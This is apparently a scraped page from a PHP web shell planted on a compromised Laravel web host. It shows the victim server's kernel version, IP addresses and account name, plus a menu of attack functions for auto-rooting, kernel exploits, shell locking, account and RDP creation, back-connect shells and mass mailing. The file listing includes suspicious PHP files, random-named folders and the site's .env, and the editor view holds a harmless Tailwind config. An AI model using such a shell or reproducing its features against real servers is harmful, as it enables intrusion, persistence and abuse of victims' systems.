Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.252
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo8.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Modules
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dnbsofy
[ DIR ]
drwxr-xr-x
fdmjgsr
[ DIR ]
drwxr-xr-x
hqutlrj
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pdiambk
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-x---
pufzmje
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
zkrsnjo
[ DIR ]
drwxr-xr-x
zowglah
[ DIR ]
drwxr-xr-x
ztarmoi
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-r--r--
.env
974
B
-rw-r--r--
.env.example
984
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
273
B
-rw-r--r--
.htaccess
181
B
-rw-r--r--
222.php
15.76
KB
-rw-r--r--
artisan
1.65
KB
-rwxr-xr-x
codecanyon-YlAVlOiv-appointo-b...
90.75
MB
-rw-r--r--
composer.json
2.96
KB
-rw-r--r--
composer.lock
406.41
KB
-rw-r--r--
def.html
263
B
-rw-r--r--
filefuns.php
5.86
KB
-r--r--r--
goat1.php
143.87
KB
-rw-r--r--
modules_statuses.json
23
B
-rw-r--r--
package-lock.json
185.91
KB
-rw-r--r--
package.json
2.11
KB
-rw-r--r--
phpunit.xml
966
B
-rw-r--r--
postcss.config.js
93
B
-rw-r--r--
random.php
52.18
KB
-rw-r--r--
server.php
563
B
-rw-r--r--
tailwind.config.js
1.89
KB
-rw-r--r--
vite.config.js
367
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tailwind.config.js
import defaultTheme from "tailwindcss/defaultTheme"; import forms from "@tailwindcss/forms"; import typography from "@tailwindcss/typography"; /** @type {import('tailwindcss').Config} */ export default { content: [ "./vendor/laravel/framework/src/Illuminate/Pagination/resources/views/*.blade.php", "./storage/framework/views/*.php", "./resources/views/**/*.blade.php", "./resources/js/**/*.js", "./app/**/*.php", ], theme: { extend: { fontFamily: { sans: ["Nunito", ...defaultTheme.fontFamily.sans], display: ["Fraunces", ...defaultTheme.fontFamily.serif], }, boxShadow: { soft: "0 18px 50px rgba(44, 62, 53, 0.08)", card: "0 22px 60px rgba(44, 62, 53, 0.08)", }, animation: { float1: "float1 7s ease-in-out infinite", float2: "float2 9s ease-in-out infinite", float3: "float3 6s ease-in-out infinite", marquee: "marquee 18s linear infinite", }, keyframes: { float1: { "0%,100%": { transform: "translateY(0) rotate(0deg)" }, "50%": { transform: "translateY(-18px) rotate(3deg)" }, }, float2: { "0%,100%": { transform: "translateY(0) rotate(0deg)" }, "50%": { transform: "translateY(-12px) rotate(-2deg)" }, }, float3: { "0%,100%": { transform: "translateY(0)" }, "50%": { transform: "translateY(-10px)" }, }, marquee: { from: { transform: "translateX(0)" }, to: { transform: "translateX(-50%)" }, }, }, }, }, plugins: [forms, typography], };
Close